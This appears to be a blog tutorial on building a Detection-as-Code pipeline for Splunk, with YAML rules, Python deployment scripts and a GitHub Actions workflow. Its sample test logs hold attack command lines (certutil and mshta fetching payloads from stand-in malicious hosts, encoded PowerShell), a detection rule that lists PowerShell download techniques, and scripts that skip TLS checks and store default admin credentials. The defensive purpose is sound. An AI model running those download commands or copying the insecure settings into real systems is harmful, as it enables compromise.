Detection-as-Code: Building Systems, Not Just Rules
Over the past few years, I've watched detection engineering evolve from a vaguely defined SOC side hustle into a foundational piece of modern security operations. People love to say "threats are getting more complex," but let's be real: 95% of what we deal with on a day-to-day basis isn't some ultra-sophisticated nation-state zero-day. It's misconfigurations, commodity malware, credential stuffing, and IT teams shipping with default passwords. The real challenge isn't tracking APT29's next move (especially when your org operates entirely out of Russia anyway); it's making sense of the overwhelming volume of logs we ingest and figuring out what actually matters, without torching your entire Splunk budget in the process. For anyone new to detection engineering: it's the art and science of turning raw telemetry into actionable security alerts.
Now, I’m not saying threat research doesn’t matter — it absolutely does. But let’s be honest: it’s expensive, time-consuming, and out of reach for most teams. Not every organization can afford a threat research team reverse-engineering malware samples, mapping out custom TTPs, and building detections from scratch. And that’s okay. A mature threat detection program doesn’t need to catch everything; it needs to catch what matters to your environment, consistently. That’s where good detection engineering comes in: writing high-fidelity logic that doesn’t break every time the data shifts or someone renames a field. But to do that properly, you need more than intuition — you need process, structure, and automation.
Instead of writing detections in the SIEM UI and copy-pasting searches like it's 2014, you treat your rules like real software: version-controlled, peer-reviewed, tested, and deployed through CI/CD. It's a mindset shift — from reactive firefighting to engineering-driven stability. In this blog, I'll walk you through how I approached building a DaC strategy using Splunk: structuring detection rules in YAML, validating SPL like real code, automating deployment with GitHub Actions, and catching issues before they hit production. Whether you're building detections solo or working in a large team, this is about scaling detection engineering without losing your mind.
This isn’t the way to implement Detection as Code — it’s just a way. DaC is more of a mindset than a strict framework. The goal is to help you think more like an engineer and build a strategy that fits your environment, team size, and tooling.
1. The Real Detection Struggle
The real problem in detection engineering isn’t always the threat itself — it’s everything orbiting around it. We’re drowning in logs we can’t parse, dealing with detections we don’t trust, triaging alerts we can’t explain, and staring at dashboards that cost more than the team’s monthly rent. Meanwhile, security teams are expected to produce meaningful results from this chaos — all while staying within budget and keeping up with the latest TTPs. It’s not just stressful — it’s unsustainable.
At its core, it’s a discipline of precision: filtering the right telemetry, writing logic that survives data drift, and ensuring the detection pipeline doesn’t collapse under its own weight. It’s equal parts systems thinking and security expertise, requiring engineers to balance coverage, clarity, and cost, often under tight timeframes and even tighter ingestion limits.
That’s exactly why I put this blog together — not to make detection engineering sound cooler than it is, but to show how adopting a Detection-as-Code mindset with Splunk helped me bring some sanity to the chaos. By treating detection logic like real code — versioned, reviewed, and tested — I ended up with a pipeline that’s actually reliable, easier to maintain, and scales with the team.
2. Think Like an Engineer
So what exactly is Detection as Code (DaC)? It's not just putting your SPL in a GitHub repo and calling it DevSecOps. It's about applying real engineering principles to the detection lifecycle, the same way developers manage software: version control, testing, peer reviews, structured formats, and CI/CD. In a traditional SIEM setup, detection rules are often created directly in the Splunk UI – written once, maybe copy-pasted from a Slack message or a blog post, and then left to rot. No context. No tests. No way to track who changed what, when, or why. If something breaks, good luck figuring it out. The DaC approach flips that on its head.
Every detection is written as code (usually in YAML or JSON), not in the UI. It lives in Git, just like your Terraform or app configs. You can test detections before they go live, roll them back when needed, and even deploy them automatically using CI/CD pipelines. Most importantly, it forces structure – so your detection engineering isn't a wild west of inconsistent rule names and forgotten thresholds. DaC also encourages mapping detections to value: you write detections based on what's needed, not just "what's available". Over time, you review unused rules and log dependencies to cut down unnecessary ingestion, making detection coverage data-driven rather than wishful thinking. Think of it like this: if you wouldn't deploy a microservice without tests or version control, why would you deploy a detection rule that alerts your SOC at 2AM without the same rigor? Detection as Code is not about adding complexity – it's about making detection engineering sustainable.
3. Turning Theory into Practice
At its core, Detection as Code is about separation of logic, structure, and process. Instead of editing rules directly in the Splunk UI, everything lives in a Git repository — version-controlled, peer-reviewed, and backed by automation. I started by organizing everything like a typical software project, with each rule as a standalone YAML file. There are even validation scripts to make sure the detections you push actually fire alerts, and that when they do, the result is either True Positive Malicious or True Positive Benign (a concept from Bradley Kemp). No more playing "Guess That SPL" in the UI.
Each detection includes structured metadata that tells the full story of the rule — not just the search logic:
name: Suspicious PowerShell File Download
cron: "*/50 * * * *"
id: "DET-High-001"
search: >
  index=windows sourcetype IN ("WinEventLogs*", "Microsoft-Windows-PowerShell*") EventCode IN (4688, 4104) AND
  ((ImageName IN ("pwsh.exe", "powershell.exe", "powershell_ise.exe") AND CommandLine IN ("*Start-BitsTransfer*", "*DownloadFile*", "*Invoke-WebRequest*", "*Invoke-RestMethod*", "*iwr *"))
  OR ScriptBlock IN ("*Start-BitsTransfer*", "*DownloadFile*", "*Invoke-WebRequest*", "*Invoke-RestMethod*", "*iwr *"))
  | stats values(_time) as Timestamp, values(sourcetype) as source, values(EventCode) as Event_Id, values(src_host) as src_host, values(CommandLine) as cmdline, values(ScriptBlock) as script, values(ImageName) as proc_name, values(pid) as process_id, values(_raw) as payload
description: Detects suspicious file download attempts via PowerShell.
disabled: false
alert_type: always
earliest_time: -5m
latest_time: now
is_alert: true
alert.severity: 4
alert.track: true
risk_score: 70
references:
- https://detection.fyi/sigmahq/sigma/windows/process_creation/proc_creation_win_powershell_download_cradles/
You can also use JSON, but YAML works fine for me: it's easy to read, easy to validate, and easy to ingest into the Python script that handles the detection pipeline. I've kept the same field names the REST API endpoint expects, so the rules can be passed through directly; alternatively, you can create another layer of abstraction where your script does the mapping for you. You can also introduce tuning fields that your Python script processes dynamically before pushing the rule to Splunk.
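As a rough illustration of that last point, here is a minimal sketch of how a hypothetical tuning block (not part of the rule format above) could be folded into the SPL before deployment. The excluded_hosts field and the exclusion clause are my assumptions, not a standard:

# Hypothetical "tuning" block in the rule YAML, resolved into SPL by the pipeline:
#
# tuning:
#   excluded_hosts: ["vuln-scanner01", "build-agent02"]

def apply_tuning(rule_data):
    """Fold optional tuning fields into the base SPL before deployment."""
    search = rule_data["search"]
    tuning = rule_data.get("tuning", {})

    excluded_hosts = tuning.get("excluded_hosts", [])
    if excluded_hosts:
        # Append an exclusion clause so known-noisy hosts never reach analysts
        hosts = ", ".join(f'"{h}"' for h in excluded_hosts)
        search += f" | search NOT src_host IN ({hosts})"

    return search

The deployment script would call something like this right before building the request body, so the YAML stays readable while the pushed SPL carries the tuning.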
I created a simple Python script that uses Splunk's REST API (documentation here) to manage the pipeline. You can build something like this:
# config is loaded from config.json, rule_data is a rule in the format shown above,
# and headers carries the authentication token
import requests

def create_saved_search_from_yaml(config, rule_data, headers):
    url = f"{config['host']}/servicesNS/admin/{config['app']}/saved/searches"
    search_query = rule_data["search"]
    # Build the request body for the saved search
    data = {
        "name": rule_data["name"],
        "search": search_query,
        "cron_schedule": rule_data["cron"],
        "description": rule_data.get("description", ""),
        "dispatch.earliest_time": rule_data.get("earliest_time", "-35m"),
        "dispatch.latest_time": rule_data.get("latest_time", "now"),
        "is_scheduled": "1",
        "alert_type": rule_data.get("alert_type", "always"),
        "alert.track": "1" if rule_data.get("alert.track", True) else "0",
        "alert.severity": str(rule_data.get("alert.severity", 3)),
    }
    # Pass through any additional action.*/alert.* settings not already set above
    for key in rule_data:
        if key in data:
            continue
        if key.startswith("action.") or key.startswith("alert.") or key in ["is_scheduled"]:
            data[key] = str(rule_data[key])
    # Send the request
    response = requests.post(url, headers=headers, data=data, verify=False)
    if response.status_code not in [200, 201]:
        raise Exception(f"Failed to create saved search:\n{response.text}")
    print(f"[+] Alert saved search '{rule_data['name']}' created successfully.")
The config.json file contains basic Splunk configuration:
{
  "host": "https://127.0.0.1:8089",
  "username": "admin",
  "password": "password",
  "token": null,
  "app": "search"
}
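To tie the pieces together, here is a minimal sketch of how the pipeline script could load the config and a rule file, authenticate, and call the function above. The "Splunk <sessionKey>" and "Bearer <token>" authorization schemes are standard Splunk REST behavior; the rule path and the PyYAML dependency are my assumptions:

import json
import requests
import yaml  # PyYAML, used to load the rule files

def get_headers(config):
    """Build request headers from a pre-issued token or a fresh session key."""
    if config.get("token"):
        return {"Authorization": f"Bearer {config['token']}"}
    # Exchange username/password for a session key via the REST API
    resp = requests.post(
        f"{config['host']}/services/auth/login",
        data={"username": config["username"], "password": config["password"], "output_mode": "json"},
        verify=False,
    )
    resp.raise_for_status()
    return {"Authorization": f"Splunk {resp.json()['sessionKey']}"}

if __name__ == "__main__":
    with open("config.json") as f:
        config = json.load(f)
    # Hypothetical rule path; in practice you would iterate over the repo
    with open("detections/endpoint/suspicious_ps_download.yaml") as f:
        rule_data = yaml.safe_load(f)
    create_saved_search_from_yaml(config, rule_data, get_headers(config))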
4. Before the Pipeline: Making Sure It Works
Just because a detection rule is written doesn’t mean it works. You need to test the SPL logic before trusting it. There are generally two scenarios when building detection logic:
- You have a dedicated lab or test environment where you simulate attacks (e.g., via Breach and Attack Simulation tools, manual red teaming, or open-source emulation frameworks), and then build detections based on observed telemetry.
- Your organization doesn’t have the luxury of a test lab or tooling budget, so you rely on threat intel reports, public threat research, and security conference talks to create detection coverage.
If you’re in the first camp, great. But make sure to validate your detection logic against the telemetry generated from your simulations before it enters the pipeline. This ensures you’re detecting real behaviors, not writing SPL that looks good but breaks in production. Also, recognize that detection research and detection engineering are different roles — one focuses on understanding threats, the other on building stable, testable detection logic.
If you’re in the second camp, no worries. You can still build strong detections — just translate threat reports and blogs into MITRE ATT&CK TTPs, and then prioritize based on your organization’s risk profile and available telemetry. Here are some ways you can test your detection logic:
- Attack simulation testing (if you have a lab): Run the technique, verify the logs, validate the detection. Use the tool of your choice, but some solid open-source options are Atomic Red Team and MITRE's Caldera.
- Mock log-based testing: Use manually crafted or sample events to check detection behavior. Splunk’s attack-data repository is a great starting point to curate your log dataset.
The main goal of attack-simulation or mock-log testing is to ensure the detection logic fires on the activity it was built for (assuming you have appropriate logging in place). There are a ton of resources out there for setting up an adversary-emulation environment and/or generating test logs; my favorite walkthrough for the Atomic Red Team setup is from John Hammond. For mock logs, here is a simple Python script to inject JSON-formatted logs into your Splunk instance via the HTTP Event Collector (HEC).
import json
import requests
import time
import random

# Configuration
splunk_url = "https://localhost:8088"
splunk_token = "xxxxxxxxx-xxxx-xxxx-xxxxx-xxxxxxxx"  # Your HEC token
splunk_index = "testing_index"
sourcetype = "_json"
log_file = "sample_logs.json"
hosts = ["host01", "host02", "endpoint01", "laptop-user", "dc01"]

# Disable SSL warnings
requests.packages.urllib3.disable_warnings()

headers = {
    "Authorization": f"Splunk {splunk_token}",
    "Content-Type": "application/json"
}

def send_log_to_splunk(event, host):
    payload = {
        "event": event,
        "host": host,
        "sourcetype": sourcetype,
        "index": splunk_index
    }
    # print("[DEBUG] Payload:", json.dumps(payload, indent=2))
    response = requests.post(
        f"{splunk_url}/services/collector",
        headers=headers,
        data=json.dumps(payload),
        verify=False
    )
    if response.status_code != 200:
        print(f"[!] Failed: {response.status_code} - {response.text}")
    else:
        print(f"[+] Sent: {event.get('Image', '[no Image]')}")

def main():
    with open(log_file, "r") as f:
        for line in f:
            line = line.strip()
            if not line:
                continue
            try:
                event = json.loads(line)
                host = random.choice(hosts)
                send_log_to_splunk(event, host)
                time.sleep(0.2)
            except Exception as e:
                print(f"[!] Error processing log: {e}")

if __name__ == "__main__":
    main()
And the sample logs should look something like this (sample_logs.json):
{"EventCode": "1", "Image": "C:\\Windows\\System32\\powershell.exe", "CommandLine": "powershell -enc dGhhbmtzIGZvciBkZWNvZGluZyB0aGlz", "ParentImage": "C:\\Windows\\explorer.exe", "User": "WIN\\User1"}
{"EventCode": "1", "Image": "C:\\Windows\\System32\\certutil.exe", "CommandLine": "certutil.exe -urlcache -split -f http://some-malicious.xyz/dropper.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "User": "WIN\\Admin"}
{"EventCode": "1", "Image": "C:\\Windows\\System32\\mshta.exe", "CommandLine": "mshta.exe http://malicious.site/malware.hta", "ParentImage": "C:\\Windows\\explorer.exe", "User": "WIN\\User3"}
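Once the mock logs have landed in the test index, you can quickly confirm that the rule's SPL actually matches them before it goes anywhere near the pipeline. Here is a minimal sketch using the /services/search/jobs/export endpoint; the credentials come from the config above, and the SPL shown is a simplified stand-in for a full rule:

import json
import requests

SPLUNK_MGMT = "https://localhost:8089"  # management port, not the HEC port
AUTH = ("admin", "password")            # same throwaway creds as config.json

def count_matches(spl, earliest="-1h", latest="now"):
    """Run the detection SPL over the test window and count matching events."""
    if not spl.strip().startswith("search"):
        spl = "search " + spl  # export expects a full search string
    resp = requests.post(
        f"{SPLUNK_MGMT}/services/search/jobs/export",
        auth=AUTH,
        data={"search": spl, "earliest_time": earliest, "latest_time": latest, "output_mode": "json"},
        verify=False,
        stream=True,
    )
    resp.raise_for_status()
    # Export streams one JSON object per line; count the final result rows
    count = 0
    for line in resp.iter_lines():
        if not line:
            continue
        row = json.loads(line)
        if row.get("result") and not row.get("preview"):
            count += 1
    return count

if __name__ == "__main__":
    spl = 'index=testing_index sourcetype=_json CommandLine="*-enc*"'
    print(f"[+] Matching events in the last hour: {count_matches(spl)}")

If the count comes back zero, either the logs never made it in or the logic is looking at the wrong fields, and both are much cheaper to discover here than in production.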
5. Automation That Saves Your Weekend
So now you’ve got nicely structured YAML rules — great. But if you’re still manually copying and pasting those rules into Splunk, or testing them in prod by watching them blow up the alert queue, you’re missing the whole point of Detection as Code. To actually treat detection engineering like engineering, you need:
- Automated validation (to catch the dumb mistakes),
- Unit and Integration testing (to ensure logic behaves as expected),
- Performance testing, and
- CI/CD pipelines (so the whole team can collaborate without breaking things).
5.1 Designing a Good CI/CD Pipeline
CI/CD transforms detection engineering from a reactive, error-prone process into a repeatable, team-friendly workflow. It reduces alert fatigue, avoids costly SPL mistakes in production, and gives you the confidence to iterate quickly — all while keeping auditability and traceability intact. When a new rule is created or modified, a typical pipeline runs through the following stages:
- YAML Validation & Linting — Ensures your detection files follow the expected schema and formatting. This includes checking for required fields, value types, and even naming conventions (a minimal sketch of such a check follows at the end of this subsection).
- SPL Syntax Validation — Rules are parsed and optionally run in a test Splunk environment or using a lightweight parser to catch syntax errors, missing macros, or broken tokens.
- Alert Volume Simulation — A test search can be run over the past X days to estimate how noisy the rule is. This helps avoid pushing high-volume detections that overwhelm analysts.
- Cron Simulation / Concurrency Testing — Many detection rules run on overlapping schedules, which can back up the search queue; simulating the schedules ahead of time helps ensure you never hit Splunk's search concurrency limits (a sketch of this check follows the repository layout in 5.2).
- CIM (Field) Validation — You might write SPL that works perfectly in your head — but fails silently in prod because your data source doesn’t include the fields you’re filtering on. You need to validate whether the fields used in the rule logic are being logged and named appropriately.
- Deployment via API — If the rule passes all checks, it's automatically pushed to Splunk using the REST API or the splunklib library. You can also set it to deploy to staging first, then push to prod after review.
- Notifications — Once deployed, the pipeline can notify your team (Slack, email, etc.), create a changelog, or update your detection dashboard.
You can achieve this using GitHub Actions, GitLab CI, Jenkins or whatever fits your workflow.
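To make the first stage concrete, here is a minimal sketch of what a schema check could look like, built around the rule format from section 3. The required-field list and the ID convention check are my own choices, not a standard:

#!/usr/bin/env python3
"""Rough sketch of a schema validator for the YAML rule format shown earlier."""
import sys
import yaml  # PyYAML

REQUIRED_FIELDS = ["name", "id", "search", "cron", "description", "alert.severity"]

def validate(path):
    with open(path) as f:
        rule = yaml.safe_load(f)
    errors = [f"missing field: {field}" for field in REQUIRED_FIELDS if field not in rule]
    if not str(rule.get("id", "")).startswith("DET-"):
        errors.append("id should follow the DET-<severity>-<number> convention")
    if not 0 <= int(rule.get("risk_score", 0)) <= 100:
        errors.append("risk_score must be between 0 and 100")
    return errors

if __name__ == "__main__":
    problems = validate(sys.argv[1])
    if problems:
        print(f"[!] {sys.argv[1]} failed schema validation:")
        for problem in problems:
            print(f"    - {problem}")
        sys.exit(1)
    print(f"[+] {sys.argv[1]} passed schema validation.")

Failing the build on these small mistakes is what keeps the 2AM alert from being a typo in a field name.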
5.2 CI/CD with GitHub Actions
Using automated testing is as important as remembering to save your detection before bragging about it on Slack. Here is a sample repository structure that you can use to get started:
detections/
├── endpoint/
│ └── suspicious_ps_encoded.yaml
tests/
├── endpoint/
│ └── suspicious_ps_encoded.test.yaml
ci/
├── validate_schema.py
├── validate_spl.py
├── simulate_cron.py
├── simulate_volume.py
├── validate_fields.py
├── deploy_to_splunk.py
.github/
└── workflows/
└── detection-pipeline.yml
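Before wiring these scripts into the workflow, here is a rough idea of what ci/simulate_cron.py could do: count how many rules are scheduled to fire in the same minute over a simulated day and fail the build when too many overlap. The croniter dependency and the MAX_CONCURRENT threshold are assumptions, not Splunk's actual scheduler limits:

#!/usr/bin/env python3
"""Rough sketch of a cron/concurrency check: flag minutes where too many rules fire at once."""
from collections import Counter
from datetime import datetime, timedelta
from pathlib import Path

import yaml
from croniter import croniter  # third-party cron parser

MAX_CONCURRENT = 5  # stand-in for your real scheduler/concurrency budget

def simulate(detections_dir="detections", hours=24):
    start = datetime.now().replace(second=0, microsecond=0)
    end = start + timedelta(hours=hours)
    fire_counts = Counter()

    for path in Path(detections_dir).rglob("*.yaml"):
        rule = yaml.safe_load(path.read_text())
        if rule.get("disabled"):
            continue
        itr = croniter(rule["cron"], start)
        ts = itr.get_next(datetime)
        while ts < end:
            fire_counts[ts] += 1  # one scheduled run for this rule at this minute
            ts = itr.get_next(datetime)

    return {ts: n for ts, n in fire_counts.items() if n > MAX_CONCURRENT}

if __name__ == "__main__":
    hot_spots = simulate()
    for ts, n in sorted(hot_spots.items()):
        print(f"[!] {n} rules scheduled at {ts} (limit {MAX_CONCURRENT})")
    raise SystemExit(1 if hot_spots else 0)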
I have Splunk ES hosted in a VM on my laptop, so I used GitHub's self-hosted runner for convenience. Here is my workflow file for reference; you can also add a Slack webhook action to send a message whenever the workflow fails.
Please note: Only use self-hosted runners with private repositories. This is because forks of your public repository can potentially run dangerous code on your self-hosted runner machine by creating a pull request that executes the code in a workflow.
name: Detection CI/CD Pipeline

on:
  push:
    branches:
      - main
    paths:
      - 'detections/**'
  pull_request:
    paths:
      - 'detections/**'

jobs:
  validate-and-deploy:
    runs-on: self-hosted
    env:
      SPLUNK_HOST: ${{ secrets.SPLUNK_HOST }}
      SPLUNK_PORT: 8089
      SPLUNK_USERNAME: ${{ secrets.SPLUNK_USERNAME }}
      SPLUNK_PASSWORD: ${{ secrets.SPLUNK_PASSWORD }}
    steps:
      - name: Checkout repository
        uses: actions/checkout@v3
        with:
          fetch-depth: 0  # full history so origin/main is available for the diff below

      - name: Set up Python
        uses: actions/setup-python@v4
        with:
          python-version: '3.11'

      - name: Install dependencies
        run: pip install -r requirements.txt

      - name: Get list of changed detection files
        id: changed
        run: |
          echo "changed_files=$(git diff --name-only origin/main -- 'detections/**/*.yaml' | tr '\n' ' ')" >> $GITHUB_OUTPUT

      - name: Print changed files
        run: echo "Changed files: ${{ steps.changed.outputs.changed_files }}"

      - name: Validate detection schema
        if: steps.changed.outputs.changed_files != ''
        run: |
          for file in ${{ steps.changed.outputs.changed_files }}; do
            python ci/validate_schema.py "$file"
          done

      - name: Validate SPL syntax
        if: steps.changed.outputs.changed_files != ''
        run: |
          for file in ${{ steps.changed.outputs.changed_files }}; do
            python ci/validate_spl.py "$file"
          done

      - name: Simulate cron and validate time windows
        if: steps.changed.outputs.changed_files != ''
        run: |
          for file in ${{ steps.changed.outputs.changed_files }}; do
            python ci/simulate_cron.py "$file"
          done

      - name: Simulate alert volume
        if: steps.changed.outputs.changed_files != ''
        run: |
          for file in ${{ steps.changed.outputs.changed_files }}; do
            python ci/simulate_volume.py "$file"
          done

      - name: Validate required fields in test data
        if: steps.changed.outputs.changed_files != ''
        run: |
          for file in ${{ steps.changed.outputs.changed_files }}; do
            python ci/validate_fields.py "$file"
          done

      - name: Push rules to Splunk
        if: steps.changed.outputs.changed_files != ''
        run: |
          for file in ${{ steps.changed.outputs.changed_files }}; do
            python ci/deploy_to_splunk.py "$file"
          done
Most of this testing can be done by interacting with the following endpoints. Of course, for almost all of these requests you'll need a Splunk authorization token in the request headers.
// Get authorization token using creds
POST /services/auth/login
// Fetch all the saved rules for admin user
GET /servicesNS/admin/search/saved/searches?output_mode=json&count=0
// Fetch hard concurrency limits set in limits.conf
GET /servicesNS/nobody/search/configs/conf-limits/search?output_mode=json
// For lightweight SPL syntax checking
POST /services/search/parser
// Actually runs the query for a small timeframe
POST /services/search/jobs/export
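As a quick illustration of the first few endpoints, the sketch below grabs a session key, asks the parser to sanity-check a rule's SPL, and reads the concurrency limits. Error handling is trimmed, and the credentials are the throwaway ones from config.json:

import requests

BASE = "https://127.0.0.1:8089"

# 1. Get a session key using the credentials from config.json
login = requests.post(
    f"{BASE}/services/auth/login",
    data={"username": "admin", "password": "password", "output_mode": "json"},
    verify=False,
)
headers = {"Authorization": f"Splunk {login.json()['sessionKey']}"}

# 2. Lightweight SPL syntax check via the parser endpoint
spl = 'search index=windows EventCode=4104 ScriptBlock="*Invoke-WebRequest*"'
parsed = requests.post(
    f"{BASE}/services/search/parser",
    headers=headers,
    data={"q": spl, "output_mode": "json"},
    verify=False,
)
print("[+] SPL parses cleanly" if parsed.ok else f"[!] Parser error: {parsed.text}")

# 3. Read the scheduler/concurrency limits from the [search] stanza of limits.conf
limits = requests.get(
    f"{BASE}/servicesNS/nobody/search/configs/conf-limits/search",
    headers=headers,
    params={"output_mode": "json"},
    verify=False,
)
# Key names depend on your limits.conf; max_searches_per_cpu is one of the standard ones
print(limits.json()["entry"][0]["content"].get("max_searches_per_cpu"))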
With good CI/CD, you stop firefighting and start engineering. Rules become assets — not liabilities. Testing isn’t an afterthought. It’s part of the workflow. And your detection team becomes faster, calmer, and a whole lot more confident.
6. Take What Works, Leave What Doesn’t (Seriously)
The strategy and tooling outlined in this blog are not meant to be taken as gospel. Every organization has its own context — different log sources, risk appetite, team capacity, and infrastructure limitations. What worked in my case may not translate directly to yours, and that's perfectly fine. Detection as Code isn't a rigid framework — it's a mindset shift. It's about applying proven software engineering practices to detection logic so that it becomes easier to manage, scale, and improve over time. If you're here looking for a one-size-fits-all solution, this blog won't give you that.
Looking ahead, there’s a lot more that can be built on top of this foundation. For instance, integrating threat intelligence feeds to dynamically tune detection logic, or linking detection pipelines with enrichment tools to auto-tag alerts before they hit the SOC queue. Feedback loops from incident response teams can inform detection tuning, while historical alert data can help build regression tests to prevent old issues from resurfacing. The possibilities are vast — and the more mature your environment becomes, the more automation, tuning, and sophistication you can introduce into the pipeline.
Ultimately, the goal isn’t just to “do Detection-as-Code” because it’s trendy. It’s to build a system where detection engineering becomes reliable, auditable, and fast. A place where rules don’t live in a spreadsheet or someone’s memory, but in a well-structured repo. This blog is a snapshot of that journey, not the final destination. Take what fits, adapt what doesn’t, and don’t be afraid to throw the whole thing out and rebuild it in a way that works best for your team. If it helps reduce alert fatigue, improve detection coverage, or simply keeps the Splunk bill in check — that’s a win.
“Because at the end of the day, reliable detection isn’t about writing perfect SPL — it’s about building a system where imperfect detections can still improve.”